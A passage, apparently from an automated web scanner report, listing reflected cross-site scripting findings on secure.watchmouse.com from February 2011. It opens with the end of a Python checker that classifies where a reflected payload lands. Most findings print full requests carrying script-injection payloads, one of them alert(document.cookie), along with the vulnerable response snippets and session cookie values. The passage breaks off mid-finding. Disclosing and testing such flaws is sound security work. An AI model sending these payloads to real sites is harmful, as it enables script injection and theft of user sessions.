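survived. The bodies below are constructed from the 1.207 and 1.208 snippets.
"""
import re

PAYLOAD_ATTR = '51d89"><script>alert(1)</script>fa2ab23bb4c'
PAYLOAD_JS = "868a8'-alert(1)-'f02a060b98b"

# Constructed: the form-action sink as it appears in the 1.208 response.
BODY_ATTR = (
    '<html><head><title>login</title></head><body>\n'
    '<form id="login_form" action="https://secure.watchmouse.com/en/'
    '?51d89"><script>alert(1)</script>fa2ab23bb4c=1" method="post">\n'
    '</form></body></html>'
)
# Constructed: the checkReferrer sink as it appears in the 1.207 response.
BODY_JS = (
    '<html><head><script type="text/javascript">\n//<![CDATA[\n'
    "function checkReferrer(){\n"
    "    var vref_string = encodeURIComponent('173.193.214.243::0::::?868a8'-alert(1)-'f02a060b98b=1');\n"
    "}\n//]]>\n</script></head><body></body></html>"
)
# Constructed (hypothetical): the same attribute sink after attribute encoding is applied.
BODY_FIXED = BODY_ATTR.replace(
    '51d89"><script>alert(1)</script>fa2ab23bb4c',
    '51d89&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;fa2ab23bb4c',
)


def _open_js_quote(code):
    """Quote character of a JS string still open at the end of `code`, or None.

    Minimal scanner: tracks single- and double-quoted strings and backslash escapes.
    Comments and template literals are out of scope for this check.
    """
    quote, i = None, 0
    while i < len(code):
        ch = code[i]
        if quote:
            if ch == "\\":
                i += 1            # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        i += 1
    return quote


def classify(body, offset):
    """Name the syntactic context at `offset`, mirroring the labels the report's prose uses."""
    pre = body[:offset]
    low = pre.lower()
    script_open, script_close = low.rfind("<script"), low.rfind("</script")
    if script_open > script_close:                       # inside an unclosed <script> block
        quote = _open_js_quote(pre[pre.find(">", script_open) + 1:])
        return {"'": "js_string_sq", '"': "js_string_dq"}.get(quote, "js_code")
    tag_open, tag_close = pre.rfind("<"), pre.rfind(">")
    if tag_open > tag_close:                             # inside an unclosed start tag
        inside = pre[tag_open:]
        if inside.count('"') % 2:
            return "html_attr_dq"
        if inside.count("'") % 2:
            return "html_attr_sq"
        return "html_attr_unquoted"
    return "html_text"


# The character that must arrive unencoded for the payload to leave each context.
BREAKOUT_CHAR = {"html_attr_dq": '"', "html_attr_sq": "'",
                 "js_string_sq": "'", "js_string_dq": '"'}


def check_reflection(body, payload):
    """For every echo of the payload's leading canary: offset, context, intact echo?, breakout?"""
    canary = re.match(r"[0-9a-f]+", payload).group(0)
    findings = []
    for m in re.finditer(re.escape(canary), body):
        start = m.start()
        context = classify(body, start)
        intact = body[start:start + len(payload)] == payload
        needed = BREAKOUT_CHAR.get(context)
        findings.append({
            "offset": start,
            "context": context,
            "intact": intact,
            "breakout": intact and needed is not None and needed in payload,
        })
    return findings


if __name__ == "__main__":
    for name, body, payload in (("1.208 attribute sink", BODY_ATTR, PAYLOAD_ATTR),
                                ("1.207 JS string sink", BODY_JS, PAYLOAD_JS),
                                ("attribute sink, encoded", BODY_FIXED, PAYLOAD_ATTR)):
        print(name, check_reflection(body, payload))
```

Run it against the body of a redirected or 404 response as well: 1.205, 1.206 and 1.209 show that the error page still echoes the tampered path, and what matters is the final body the browser renders, not the status code.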

1.209. https://secure.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/api/checkreferrer.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea18e"><script>alert(1)</script>01a73cf344e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enea18e"><script>alert(1)</script>01a73cf344e/api/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef= HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:41:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-9c1b20797a760b68d1bcf320b47949d1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enea18e"><script>alert(1)</script>01a73cf344e/api/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef=" method="post">
...[SNIP]...

1.210. https://secure.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/api/checkreferrer.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 135f0"><script>alert(1)</script>4689ac62e53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/api135f0"><script>alert(1)</script>4689ac62e53/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef= HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; nkey=WMA4D528314AD809

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:41:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ede973fd35763e7cc9f4de62b6659d65"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/api135f0"><script>alert(1)</script>4689ac62e53/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef=" method="post">
...[SNIP]...

1.211. https://secure.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/api/checkreferrer.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d516f"><script>alert(1)</script>8c0c9114fe3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/api/checkreferrer.phpd516f"><script>alert(1)</script>8c0c9114fe3?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef= HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; nkey=WMA4D528314AD809

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:41:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2f1f90e413017b9ae31d959c7b980287"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/api/checkreferrer.phpd516f"><script>alert(1)</script>8c0c9114fe3?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef=" method="post">
...[SNIP]...

1.212. https://secure.watchmouse.com/en/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78385"><script>alert(1)</script>70cefa9d93e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en78385"><script>alert(1)</script>70cefa9d93e/index.php HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:45 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-bbb7b4d62458697c0c77d7a5ae3089ea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en78385"><script>alert(1)</script>70cefa9d93e/index.php" method="post">
...[SNIP]...

1.213. https://secure.watchmouse.com/en/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d83c"><script>alert(1)</script>419d908d897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/index.php4d83c"><script>alert(1)</script>419d908d897 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:46 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-4ee4bf6bbb35c0a31039b8159b55d868"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/index.php4d83c"><script>alert(1)</script>419d908d897" method="post">
...[SNIP]...

1.214. https://secure.watchmouse.com/en/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c2ef'-alert(1)-'734d5cd72d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/index.php3c2ef'-alert(1)-'734d5cd72d HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:47 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-f11ebd7d412915e5e80bd321e8eadeea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::index.php3c2ef'-alert(1)-'734d5cd72d');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

1.215. https://secure.watchmouse.com/en/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d889e"><script>alert(1)</script>e0ab6664ecc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/index.php?d889e"><script>alert(1)</script>e0ab6664ecc=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:35 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-99fd5c02e24002e34e089d9fc81ca7bb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/index.php?d889e"><script>alert(1)</script>e0ab6664ecc=1" method="post">
...[SNIP]...

1.216. https://secure.watchmouse.com/en/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433cc'-alert(1)-'69fa900d091 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/index.php?433cc'-alert(1)-'69fa900d091=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-27ae6b927411d02a3806e576421a9f66"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::index.php?433cc'-alert(1)-'69fa900d091=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

1.217. https://secure.watchmouse.com/en/learn_more.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d70f"><script>alert(1)</script>13cc805ad41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en7d70f"><script>alert(1)</script>13cc805ad41/learn_more.php HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:46 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-735bbb43f3b0352e9355ebe02058e15c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en7d70f"><script>alert(1)</script>13cc805ad41/learn_more.php" method="post">
...[SNIP]...

1.218. https://secure.watchmouse.com/en/learn_more.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52cbc"><script>alert(1)</script>0aea601631c was submitted in the REST URL parameter 2. This input was echoed unmodif